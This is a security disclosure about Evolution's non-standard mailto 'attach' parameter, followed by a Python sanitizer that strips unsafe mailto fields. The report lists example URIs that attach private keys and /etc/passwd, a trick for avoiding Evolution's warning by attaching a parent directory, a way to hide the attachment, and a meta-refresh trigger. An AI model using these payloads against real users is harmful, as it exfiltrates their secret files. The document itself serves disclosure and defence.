Warn about and limit what can be attached using mailto: URI
In the scope of academic research we stumbled over a flaw (feature?) in Evolution (tested v.3.34.1-2+b1):
By using the proprietary (non-RFC6068) "mailto?attach=..." parameter, a website (or other sources of mailto links) can make Evolution attach local files to the composed email. This is arguably a dangerous feature because it allows an attacker to exfiltrate arbitrary files on disk, if the victim sends an email based on attacker-controlled mailto input and misses the attachment being added.
Obtain sensitive files (with a warning message):
mailto:email@example.com?attach=.gnupg/secring.gpg
mailto:firstname.lastname@example.org?attach=.ssh/id_rsa
mailto:email@example.com?attach=/etc/passwd
Obtain sensitive files (without a warning message):
Obtain zip archive with all files in user's home directory (no warning):
Evolution shows a warning for files in /etc and files beginning with a dot (hidden files). However, this can be circumvented by simply attaching the whole (upper) directory.
Note that the existence of the attachment may be further obfuscated by prepending multiple attach parameters with innocent file names or no file name at all (e.g., attach=/). Multiple attachments can be included at once by using multiple "attach" parameters in a single mailto URL.
Also note that a future version of Evolution may add the feature to auto-save draft messages to the IMAP "drafts" folder after a couple of minutes. Thereby, Evolution would auto-save the email (including all attachments) to the victim's IMAP "drafts" folder. This would be problematic in the scenario of a malicious email provider which could trigger something like...
<meta http-equiv="refresh" content="60; URL=mailto:?attach=...">
...when the user is at lunchtime and thereby exfiltrate local files on disk to the attacker-controlled IMAP server.
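One handler-side mitigation for the behaviour reported above, as an added example that is not Evolution's code: a filter that keeps only an allowlist of header fields from a mailto URI before it reaches the mail client and reports what it dropped. The function name, the allowlist contents and the sample links are assumptions constructed for illustration.

```python
from urllib.parse import urlsplit, unquote, quote

# Assumption: the only header fields this handler is willing to prefill.
# Anything else (including the non-RFC 6068 "attach") is dropped.
SAFE_FIELDS = {"to", "cc", "bcc", "subject", "body", "in-reply-to"}


def sanitize_mailto(uri):
    """Return (clean_uri, dropped); dropped is a list of (name, value) pairs."""
    parts = urlsplit(uri.strip())
    if parts.scheme.lower() != "mailto":
        raise ValueError("not a mailto URI")
    kept, dropped = [], []
    # Split by hand: in a mailto URI "+" is a literal plus, so form-style
    # decoding (which turns "+" into a space) would be wrong here.
    for field in filter(None, parts.query.split("&")):
        raw_name, _, raw_value = field.partition("=")
        # Decode and lowercase the name first, so "ATTACH" and "%61ttach"
        # are compared in the same form as "attach".
        name = unquote(raw_name).strip().lower()
        value = unquote(raw_value)
        (kept if name in SAFE_FIELDS else dropped).append((name, value))
    query = "&".join(f"{n}={quote(v, safe='')}" for n, v in kept)
    clean = "mailto:" + parts.path + (f"?{query}" if query else "")
    return clean, dropped


# Constructed sample links, using the file names from the report.
SAMPLES = [
    "mailto:email@example.com?subject=Hello&attach=.ssh/id_rsa",
    "mailto:email@example.com?ATTACH=/etc/passwd&%61ttach=/",
    "mailto:?attach=/",
    "mailto:email@example.com?subject=Invoice%20%231",
]

if __name__ == "__main__":
    for link in SAMPLES:
        clean, dropped = sanitize_mailto(link)
        print(f"{clean}  dropped={dropped}")
```

An allowlist is used rather than a blocklist of "attach" so that other client-specific parameters are rejected by default as well.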